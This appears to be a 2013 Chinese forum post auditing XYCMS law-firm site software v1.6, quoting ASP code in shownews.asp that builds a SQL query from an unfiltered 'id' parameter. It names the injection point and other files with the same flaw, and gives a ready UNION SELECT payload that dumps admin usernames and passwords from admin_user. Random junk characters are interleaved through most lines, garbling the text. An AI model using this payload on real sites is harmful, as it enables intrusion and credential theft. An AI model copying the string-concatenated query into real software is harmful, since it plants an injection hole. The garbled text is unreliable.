前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. F! E( P$ e8 @5 L. @
$ o' y3 h0 b* ]. j$ P' ^* K: v淫荡分割线
2 R' X/ v; V: A8 r--------------------------------------------------------0 G, H$ u* h7 U* g( p* ~* |. c
; y! @: e$ {7 U4 V! W- G
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
" G2 ~9 G* {, l: \/ T; F; _源码地址:http://down.chinaz.com/soft/29233.htm
" A9 c7 @1 j& q$ D, F& S3 Y
5 v i/ e+ _1 W4 u8 K9 p! o漏洞文件:shownews.asp
% u" i. i( Z4 K. b( p漏洞代码:7-13行
0 P1 `! g/ _5 c: u) r
9 m5 z( O; \% P; I2 P8 y3 w" _$ Y 2 Z# W1 b) z: ^/ m6 D- X+ `4 K
<% " S8 R! ^5 ^7 M) l
id=request.QueryString("id")3 f5 Z( r, d% U- c$ A
# U |2 B* q& J l* L- r
set snews=server.createobject("adodb.recordset") , z8 x/ a( [+ B# [* y
exec="select * from [news] where id="&id# s O) D5 `- Q2 H' a) H
snews.open exec,conn,1,1- x" C) R8 F1 ]' u
%>; q# d; ] `6 m) M. q) {$ [! i' `" C
# ]# J6 k' i4 z' `7 g) v, s
4 g. L$ k% {( ?% B% G E什么过滤都没有 直造成注入7 U( r! Y% n# ?# {, [* R
9 _. m3 ~# b, x5 t5 E
注入点:http://127.0.0.1:99/shownews.asp?id=xx& [0 F! m- H* p, `/ h& G5 k
7 |) i5 c' A+ i. d7 h) r其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
; S" ?! D7 e. p4 n( c X4 _( X1 W7 C . O+ |- t$ l. S: o2 U" Q8 _% [1 W
! Y9 V0 n! J4 } ]; P- ?exp: union select 1,admin,password,4,5,7 from admin_user5 W( |7 ?) T: b/ C: R
; J2 ^- V3 R7 P; l |
发表于 2013-4-4 17:28:12
收藏
支持
反对